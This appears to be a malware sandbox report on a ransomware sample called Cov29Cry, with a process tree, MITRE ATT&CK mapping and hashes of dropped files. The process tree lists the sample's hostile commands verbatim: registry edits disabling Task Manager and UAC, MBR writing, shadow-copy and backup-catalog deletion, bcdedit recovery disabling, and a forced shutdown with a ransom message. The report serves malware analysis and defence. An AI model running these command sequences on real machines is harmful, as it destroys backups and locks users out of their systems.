C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6D2C.tmp\fakeerror.vbs"3⤵
- System Location Discovery: System Language Discovery
PID:2296
-
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 23⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3036
-
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f3⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:4160
-
-
C:\Windows\SysWOW64\reg.exereg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f3⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:4104
-
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f3⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:4364
-
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f3⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:1748
-
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f3⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:1408
-
-
C:\Windows\SysWOW64\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f3⤵
- UAC bypass
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:1492
-
-
C:\Windows\SysWOW64\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f3⤵
- UAC bypass
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:556
-
-
C:\Users\Admin\AppData\Local\Temp\6D2C.tmp\mbr.exembr.exe3⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- System Location Discovery: System Language Discovery
PID:1676
-
-
C:\Users\Admin\AppData\Local\Temp\6D2C.tmp\Cov29Cry.exeCov29Cry.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5028 -
C:\Users\Admin\AppData\Roaming\svchost.exe"C:\Users\Admin\AppData\Roaming\svchost.exe"4⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Drops desktop.ini file(s)
- Sets desktop wallpaper using registry
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2840 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete5⤵PID:1280
-
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet6⤵
- Interacts with shadow copies
PID:1668
-
-
C:\Windows\System32\Wbem\WMIC.exewmic shadowcopy delete6⤵
- Suspicious use of AdjustPrivilegeToken
PID:5224
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no5⤵PID:5300
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures6⤵
- Modifies boot configuration data using bcdedit
PID:5344
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled no6⤵
- Modifies boot configuration data using bcdedit
PID:5360
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet5⤵PID:5380
-
C:\Windows\system32\wbadmin.exewbadmin delete catalog -quiet6⤵
- Deletes backup catalog
PID:5432
-
-
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\covid29-is-here.txt5⤵PID:5776
-
-
-
-
C:\Windows\SysWOW64\shutdown.exeshutdown /r /t 300 /c "5 minutes to pay until you lose your data and system forever"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3528
-
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 93⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4104
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im explorer.exe3⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5960
-
-
C:\Users\Admin\AppData\Local\Temp\6D2C.tmp\Cov29LockScreen.exeCov29LockScreen.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:6008
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4120
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5464
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:5500
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:5536
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Direct Volume Access
1Impair Defenses
1Disable or Modify Tools
1Indicator Removal
3File Deletion
3Modify Registry
3Pre-OS Boot
1Bootkit
1Discovery
Browser Information Discovery
1Peripheral Device Discovery
1Query Registry
4Remote System Discovery
1System Information Discovery
4System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Internet Connection Discovery
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
11KB
MD5558d8e184f72d3b64b0db866f92003cd
SHA1400435f57b8c499f312011c3219cbefcac8947ba
SHA25651a0066f2c3479b38076e59c2eb4e1b0bb5ee5b51acb607db204b4b86e673bb1
SHA512880f9d10bce6e7edd1737dfacb369f3d14e750c8274c849a6dafce12b6dfc8b052d485b3c54664f228d98a9f9ce9a6b43316b7d45c1fedc58111d8d4678ca571
-
Filesize
152B
MD5f9664c896e19205022c094d725f820b6
SHA1f8f1baf648df755ba64b412d512446baf88c0184
SHA2567121d84202a850791c2320385eb59eda4d697310dc51b1fcd4d51264aba2434e
SHA5123fa5d2c68a9e70e4a25eaac2095171d87c741eec2624c314c6a56f4fa390d6319633bf4c48b1a4af7e9a0451f346beced9693da88cfc7bcba8dfe209cbd1b3ae
-
Filesize
152B
MD5847d47008dbea51cb1732d54861ba9c9
SHA1f2099242027dccb88d6f05760b57f7c89d926c0d
SHA25610292fa05d896a2952c1d602a72d761d34bc776b44d6a7df87e49b5b613a8ac1
SHA512bd1526aa1cc1c016d95dfcc53a78b45b09dde4ce67357fc275ab835dbe1bb5b053ca386239f50cde95ad243a9c1bbb12f7505818577589beecc6084f7b94e83f
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\5161517a-ef4c-4c17-9a49-3011e29d52d6.tmp
Filesize6KB
MD553517e8bd9faca9729c85874ae11460a
SHA14869f6bd81313d5eec50df7485719d7924059b35
SHA256efe48dae3fb924b1e7dea0b8a8347bd279cb814489e14baf29bea4d4a5107162
SHA512892013b3fce8c4e1858d69446acb3d364e75b61388ae05c8b44300408b77a6c813f7b686594edb6c824e6ba49a7a58cc1d7bdb6131781922d4a502549faf66cf
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize2KB
MD5f46013155095b4f51b11eadf66cab472
SHA1d1929276a8c439b9007b7b4661d9a3f4ad7ce4a1
SHA2566d92a58beb05a261979dff72fbbfe41cfaf48d1bdf7cc3cccb1d312029dbf5a6
SHA51224277af96b069540e82e8d6d9b27f07f8cc221960b4a703fe22b67e1ce525e242a4c51ce11c7d386eb8fccd542a8d93a34a675cbee0dfeb38ff946af36f48e87
-
Filesize
579B
MD5ed5f4213c17629776cd75510648fc019
SHA1ebfa685dca9b7c920cd5ad521c03e4ad0ce435b9
SHA256e969795f0e63ec8a35cdf34d5bc43867ca0825bebfed9734943e69b34ed2ad87
SHA51271bcc166ae5a48f7a79aa5de7ecc7e10dce22c39240ca9ffe9d0f9340f40fc2a2429529cfee8b2b5d7082efe94921fa7df3454852d5313ff4093bfdffc189627
-
Filesize
6KB
MD5ace65d124d0965ddadf4ed77fe3c3f61
SHA1398ba9eb5bc71557b38e22b38b3834c1f01abc39
SHA256ac27d10beef56694db4c5c75af31526bc3bab24ea577cfba21908b3a9a404dc8
SHA5129576187bf67a02cd4f52ba440f9c120161771bcac6faeb0664f49145725a8efe3e361b0a64cee4e2fb093ea0f2f17888ac05aa7d6650a31224f4bb5cb066c43a
-
Filesize
6KB
MD5e62ef374b5f86e3ee693325e081448f9
SHA1c1cc7bb1eea3e5d7008cf16801e53c57e20ee8d2
SHA256928f9b7560714fe37cd29da0064ae6f82b1737e44fa1f9927541012ebafe41be
SHA5126dae19749098d80923e6ffa91c1272269a7b348435fe01203e27a7d423e1e4c48f9547c41ee8c56eea1c991bdf824d8f4b8af5d83b041c7b2dec32f841e1cf22
-
Filesize
5KB
MD516c4a804aa8307c84777942be6fcb352
SHA13ff35ad6826a2b983f3de10a4b937af566b0f7f0
SHA256cab0be06b556ceb40abf4fa20dc5ce2c80fabbe99d87af215409737f29fb8c75
SHA512fb9db42c3dbcdd6e4f6351b3c28cbc6eaba91c84615bd401a6300cd107b37dcc607bb42acf26a8a0915f7fc3a0690259b6cca5b94ea342382eefd4b72b503cd7
-
Filesize
1KB
MD50743c04232b9b7d61d351fc7e49efbb9
SHA1b3d5e1c5421b52930244974f70624a3fd95d6f93
SHA2568cfcd39ca18fbdbfe53cc9d778bd75f9e38090d9a0ff2a3360359bb81dfc1a0c
SHA512e868498afde8c2e4e5d50ce0d56a9a65bb838676c78d919cf0f60029a41781d0588c6e4ffa0c2a8cbecbe424c9b738f4f594db61d431ba9235dd0e8a80ed148f
-
Filesize
1KB
MD5c75fde5279135e59b93bfc6de47dd1a8
SHA15aaea730bdb6121126a06a8118245355f72366e0
SHA256eeba950bbac9b9a7b81122f720d4b0737eeb62411cbb28f7430ae6019ba197a4
SHA5122d9ea32026b60154e32fa34829fb09eaa15212556e8bfd4370f265a6854c607877d849880de9d82dd94fd3d782bc218b604548df4692e130c2493cfc198b11f9
-
Filesize
874B
MD537bbec63761489b75c78f38b0543256a
SHA1192bdf504a4be4c309451257154a703a6748569d
SHA25665ac6fcdac8c630da74dc3c9b65498e9efc0477fa7bb5a28472a2da03429208a
SHA512895826f11d51fca2067b472a6fe9334efcf51d890804732beb00a245a68df4b6cbf4a26456562a454eab37ed35cf054bc1cc3447c4fae029f484f6d281b4b83f
-
Filesize
16B
MD56752a1d65b201c13b62ea44016eb221f
SHA158ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA2560861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA5129cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
Filesize
10KB
MD5be93cfab9ca0bba96918fc418bb896c5
SHA1ae944662fb3eeddd829e7aaf705efa953ea10908
SHA25638bda2b7358bdc25e4a5054a31c14d1c7a81020d77fff3b649015a8b83e5d694
SHA5127a2e564e1bc8cf8f7d6786d50e1079aa88fe7d9921da5779472f1c0ec5ab0043d936ce9f8d5bcb803be42d992e75644f9ba98aa65ff32a5d7e51ff123b78631a
-
Filesize
10KB
MD5412d97a9f22cdc2b6b53dbe3c49d2cbe
SHA1272d8b4310479dbdfbb75e8d55fd9b2e947ec9b5
SHA256e5d5a8ca344cbdedc8ea4e0e37a02d3911b53da5f65dfb5a3cdee98733938b67
SHA512e57bd4f5aed5b74af5789a2436c5c2c221a080356a9d66ed26c3cdff8b617c8613b43d8786d0ff38ad2a4141bea15608e15d111a4bb65704af371684fbd26235
-
Filesize
103KB
MD58bcd083e16af6c15e14520d5a0bd7e6a
SHA1c4d2f35d1fdb295db887f31bbc9237ac9263d782
SHA256b4f78ff66dc3f5f8ddd694166e6b596d533830792f9b5f1634d3f5f17d6a884a
SHA51235999577be0626b50eeab65b493d48af2ab42b699f7241d2780647bf7d72069216d99f5f708337a109e79b9c9229613b8341f44c6d96245fd1f3ac9f05814d6a
-
Filesize
48KB
MD5f724c6da46dc54e6737db821f9b62d77
SHA1e35d5587326c61f4d7abd75f2f0fc1251b961977
SHA2566cde4a9f109ae5473703c4f5962f43024d71d2138cbd889223283e7b71e5911c
SHA5126f83dd7821828771a9cae34881c611522f6b5a567f5832f9e4b9b4b59bf495f40ad78678bd86cba59d32ea8644b4aa5f052552774fea142b9d6da625b55b6afc
-
Filesize
1KB
MD557f0432c8e31d4ff4da7962db27ef4e8
SHA1d5023b3123c0b7fae683588ac0480cd2731a0c5e
SHA256b82e64e533789c639d8e193b78e06fc028ea227f55d7568865120be080179afc
SHA512bc082486503a95f8e2ce7689d31423386a03054c5e8e20e61250ca7b7a701e98489f5932eba4837e05ec935057f18633798a10f6f84573a95fcf086ee7cabcbf
-
Filesize
144B
MD5c0437fe3a53e181c5e904f2d13431718
SHA144f9547e7259a7fb4fe718e42e499371aa188ab6
SHA256f2571f03eb9d5ee4dca29a8fec1317ded02973c5dd233d582f56cebe98544f22
SHA512a6b488fc74dc69fc4227f92a06deb297d19cd54b0e07659f9c9a76ce15d1ef1d8fa4d607acdd03d30d3e2be2a0f59503e27fc95f03f3006e137fa2f92825e7e3
-
Filesize
1.3MB
MD535af6068d91ba1cc6ce21b461f242f94
SHA1cb054789ff03aa1617a6f5741ad53e4598184ffa
SHA2569ac99df89c676a55b48de00384506f4c232c75956b1e465f7fe437266002655e
SHA512136e3066c6e44af30691bcd76d9af304af0edf69f350211cf74d6713c4c952817a551757194b71c3b49ac3f87a6f0aa88fb80eb1e770d0f0dd82b29bfce80169
-
Filesize
861B
MD5c53dee51c26d1d759667c25918d3ed10
SHA1da194c2de15b232811ba9d43a46194d9729507f0
SHA256dd5b3d185ae1809407e7822de4fced945115b48cc33b2950a8da9ebd77a68c52
SHA512da41cef03f1b5f21a1fca2cfbf1b2b180c261a75d391be3a1ba36e8d4d4aefab8db024391bbee06b99de0cb0b8eb8c89f2a304c27e20c0af171b77db33b2d12c
-
Filesize
1.7MB
MD5272d3e458250acd2ea839eb24b427ce5
SHA1fae7194da5c969f2d8220ed9250aa1de7bf56609
SHA256bbb5c6b4f85c81a323d11d34629776e99ca40e983c5ce0d0a3d540addb1c2fe3
SHA512d05bb280775515b6eedf717f88d63ed11edbaae01321ec593ecc0725b348e9a0caacf7ebcd2c25a6e0dc79b2cdae127df5aa380b48480332a6f5cd2b32d4e55c